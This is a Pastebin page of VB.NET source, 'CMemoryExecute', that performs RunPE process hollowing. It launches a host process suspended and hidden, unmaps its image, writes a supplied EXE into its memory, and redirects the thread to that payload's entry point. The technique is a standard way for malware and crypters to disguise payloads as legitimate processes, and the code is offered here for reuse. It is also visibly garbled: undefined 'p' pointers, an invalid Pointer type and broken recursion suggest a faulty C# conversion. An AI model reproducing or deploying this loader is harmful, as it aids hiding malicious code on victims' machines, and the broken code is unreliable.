API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 20th, 2017
170
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 8.23 KB | None | 0 0
raw download clone embed print report
  1. Imports System.Runtime.InteropServices
  2.  
  3. '
  4. ' * Title: CMemoryExecute.cs
  5. ' * Description: Runs an EXE in memory using native WinAPI. Very optimized and tiny.
  6. ' *
  7. ' * Developed by: affixiate
  8. ' * Release date: December 10, 2010
  9. ' * Released on: http://opensc.ws
  10. ' * Credits:
  11. ' * MSDN (http://msdn.microsoft.com)
  12. ' * NtInternals (http://undocumented.ntinternals.net)
  13. ' * Pinvoke (http://pinvoke.net)
  14. ' *
  15. ' * Comments: If you use this code, I require you to give me credits. Don't be a ripper! ;]
  16. '
  17.  
  18.  
  19. ' ReSharper disable InconsistentNaming
  20. Public NotInheritable Class CMemoryExecute
  21.     Private Sub New()
  22.     End Sub
  23.     Public Structure STARTUPINFO
  24.         Public cb As UInteger
  25.         Public lpReserved As String
  26.         Public lpDesktop As String
  27.         Public lpTitle As String
  28.         Public dwX As UInteger
  29.         Public dwY As UInteger
  30.         Public dwXSize As UInteger
  31.         Public dwYSize As UInteger
  32.         Public dwXCountChars As UInteger
  33.         Public dwYCountChars As UInteger
  34.         Public dwFillAttribute As UInteger
  35.         Public dwFlags As UInteger
  36.         Public wShowWindow As Short
  37.         Public cbReserved2 As Short
  38.         Public lpReserved2 As IntPtr
  39.         Public hStdInput As IntPtr
  40.         Public hStdOutput As IntPtr
  41.         Public hStdError As IntPtr
  42.     End Structure
  43.  
  44.     ''' <summary>
  45.     ''' Runs an EXE (which is loaded in a byte array) in memory.
  46.     ''' </summary>
  47.     ''' <param name="exeBuffer">The EXE buffer.</param>
  48.     ''' <param name="hostProcess">Full path of the host process to run the buffer in.</param>
  49.     ''' <param name="optionalArguments">Optional command line arguments.</param>
  50.     ''' <returns></returns>
  51.     Public Shared Function Run(exeBuffer As Byte(), hostProcess As String, Optional optionalArguments As String = "") As Boolean
  52.         ' STARTUPINFO
  53.         Dim StartupInfo As New STARTUPINFO()
  54.         StartupInfo.dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW
  55.         StartupInfo.wShowWindow = SW_HIDE
  56.  
  57.         Dim IMAGE_SECTION_HEADER = New Byte(39) {}
  58.         ' pish
  59.         Dim IMAGE_NT_HEADERS = New Byte(247) {}
  60.         ' pinh
  61.         Dim IMAGE_DOS_HEADER = New Byte(63) {}
  62.         ' pidh
  63.         Dim PROCESS_INFO = New Integer(3) {}
  64.         ' pi
  65.         Dim CONTEXT = New Byte(715) {}
  66.         ' ctx
  67.         Dim pish As Pointer(Of Byte)
  68.         pish = p
  69.  
  70.         Dim pinh As Pointer(Of Byte)
  71.         pinh = p
  72.  
  73.         Dim pidh As Pointer(Of Byte)
  74.         pidh = p
  75.  
  76.         Dim ctx As Pointer(Of Byte)
  77.         ctx = p
  78.  
  79.         ' Set the flag.
  80.         ' ContextFlags
  81.         CType(ctx + &H0, Pointer(Of UInteger)).Target = CONTEXT_FULL
  82.  
  83.         ' Get the DOS header of the EXE.
  84.         Buffer.BlockCopy(exeBuffer, 0, IMAGE_DOS_HEADER, 0, IMAGE_DOS_HEADER.Length)
  85.  
  86.         ' Sanity check: See if we have MZ header.
  87.  
  88.         ' e_magic
  89.         If CType(pidh + &H0, Pointer(Of UShort)).Target <> IMAGE_DOS_SIGNATURE Then
  90.             Return False
  91.         End If
  92.  
  93.         Dim e_lfanew = CType(pidh + &H3c, Pointer(Of Integer)).Target
  94.  
  95.         ' Get the NT header of the EXE.
  96.         Buffer.BlockCopy(exeBuffer, e_lfanew, IMAGE_NT_HEADERS, 0, IMAGE_NT_HEADERS.Length)
  97.  
  98.         ' Sanity check: See if we have PE00 header.
  99.  
  100.         ' Signature
  101.         If CType(pinh + &H0, Pointer(Of UInteger)).Target <> IMAGE_NT_SIGNATURE Then
  102.             Return False
  103.         End If
  104.  
  105.         ' Run with parameters if necessary.
  106.         If Not String.IsNullOrEmpty(optionalArguments) Then
  107.             hostProcess += Convert.ToString(" ") & optionalArguments
  108.         End If
  109.  
  110.         If Not CreateProcess(Nothing, hostProcess, IntPtr.Zero, IntPtr.Zero, False, CREATE_SUSPENDED, _
  111.             IntPtr.Zero, Nothing, StartupInfo, PROCESS_INFO) Then
  112.             Return False
  113.         End If
  114.  
  115.         Dim ImageBase = New IntPtr(CType(pinh + &H34, Pointer(Of Integer)).Target)
  116.         ' pi.hProcess
  117.         NtUnmapViewOfSection(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase)
  118.         ' pi.hProcess
  119.         ' SizeOfImage
  120.         If VirtualAllocEx(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase, CType(pinh + &H50, Pointer(Of UInteger)).Target, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE) = IntPtr.Zero Then
  121.             Run(exeBuffer, hostProcess, optionalArguments)
  122.         End If
  123.         ' Memory allocation failed; try again (this can happen in low memory situations)
  124.         ' pi.hProcess
  125.         ' SizeOfHeaders
  126.         NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), ImageBase, DirectCast(p, IntPtr), CType(pinh + 84, Pointer(Of UInteger)).Target, IntPtr.Zero)
  127.  
  128.         For i As UShort = 0 To CType(pinh + &H6, Pointer(Of UShort)).Target - 1
  129.             ' NumberOfSections
  130.             Buffer.BlockCopy(exeBuffer, e_lfanew + IMAGE_NT_HEADERS.Length + (IMAGE_SECTION_HEADER.Length * i), IMAGE_SECTION_HEADER, 0, IMAGE_SECTION_HEADER.Length)
  131.             ' PointerToRawData
  132.             ' pi.hProcess
  133.                 ' VirtualAddress
  134.             ' SizeOfRawData
  135.             NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), DirectCast(CInt(ImageBase) + CType(pish + &Hc, Pointer(Of UInteger)).Target, IntPtr), DirectCast(p, IntPtr), CType(pish + &H10, Pointer(Of UInteger)).Target, IntPtr.Zero)
  136.         Next
  137.  
  138.         ' pi.hThread
  139.         NtGetContextThread(DirectCast(PROCESS_INFO(1), IntPtr), DirectCast(ctx, IntPtr))
  140.         ' pi.hProcess
  141.             ' ecx
  142.         NtWriteVirtualMemory(DirectCast(PROCESS_INFO(0), IntPtr), DirectCast(CType(ctx + &Hac, Pointer(Of UInteger)).Target, IntPtr), ImageBase, &H4, IntPtr.Zero)
  143.         ' eax
  144.             ' AddressOfEntryPoint
  145.         CType(ctx + &Hb0, Pointer(Of UInteger)).Target = CUInt(ImageBase) + CType(pinh + &H28, Pointer(Of UInteger)).Target
  146.         ' pi.hThread
  147.         NtSetContextThread(DirectCast(PROCESS_INFO(1), IntPtr), DirectCast(ctx, IntPtr))
  148.         ' pi.hThread
  149.         NtResumeThread(DirectCast(PROCESS_INFO(1), IntPtr), IntPtr.Zero)
  150.  
  151.  
  152.         Return True
  153.     End Function
  154.  
  155.     #Region "WinNT Definitions"
  156.  
  157.     Private Const CONTEXT_FULL As UInteger = &H10007
  158.     Private Const CREATE_SUSPENDED As Integer = &H4
  159.     Private Const MEM_COMMIT As Integer = &H1000
  160.     Private Const MEM_RESERVE As Integer = &H2000
  161.     Private Const PAGE_EXECUTE_READWRITE As Integer = &H40
  162.     Private Const IMAGE_DOS_SIGNATURE As UShort = &H5a4d
  163.     ' MZ
  164.     Private Const IMAGE_NT_SIGNATURE As UInteger = &H4550
  165.     ' PE00
  166.     Private Shared SW_SHOW As Short = 5
  167.     Private Shared SW_HIDE As Short = 0
  168.     Private Const STARTF_USESTDHANDLES As UInteger = &H100
  169.     Private Const STARTF_USESHOWWINDOW As UInteger = &H1
  170.  
  171.  
  172.     #Region "WinAPI"
  173.     <DllImport("kernel32.dll", SetLastError := True)> _
  174.     Private Shared Function CreateProcess(lpApplicationName As String, lpCommandLine As String, lpProcessAttributes As IntPtr, lpThreadAttributes As IntPtr, bInheritHandles As Boolean, dwCreationFlags As UInteger, _
  175.         lpEnvironment As IntPtr, lpCurrentDirectory As String, ByRef lpStartupInfo As STARTUPINFO, lpProcessInfo As Integer()) As Boolean
  176.     End Function
  177.  
  178.     <DllImport("kernel32.dll", SetLastError := True)> _
  179.     Private Shared Function VirtualAllocEx(hProcess As IntPtr, lpAddress As IntPtr, dwSize As UInteger, flAllocationType As UInteger, flProtect As UInteger) As IntPtr
  180.     End Function
  181.  
  182.     <DllImport("ntdll.dll", SetLastError := True)> _
  183.     Private Shared Function NtUnmapViewOfSection(hProcess As IntPtr, lpBaseAddress As IntPtr) As UInteger
  184.     End Function
  185.  
  186.     <DllImport("ntdll.dll", SetLastError := True)> _
  187.     Private Shared Function NtWriteVirtualMemory(hProcess As IntPtr, lpBaseAddress As IntPtr, lpBuffer As IntPtr, nSize As UInteger, lpNumberOfBytesWritten As IntPtr) As Integer
  188.     End Function
  189.  
  190.     <DllImport("ntdll.dll", SetLastError := True)> _
  191.     Private Shared Function NtGetContextThread(hThread As IntPtr, lpContext As IntPtr) As Integer
  192.     End Function
  193.  
  194.     <DllImport("ntdll.dll", SetLastError := True)> _
  195.     Private Shared Function NtSetContextThread(hThread As IntPtr, lpContext As IntPtr) As Integer
  196.     End Function
  197.  
  198.     <DllImport("ntdll.dll", SetLastError := True)> _
  199.     Private Shared Function NtResumeThread(hThread As IntPtr, SuspendCount As IntPtr) As UInteger
  200.     End Function
  201.     #End Region
  202.  
  203.     #End Region
  204. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!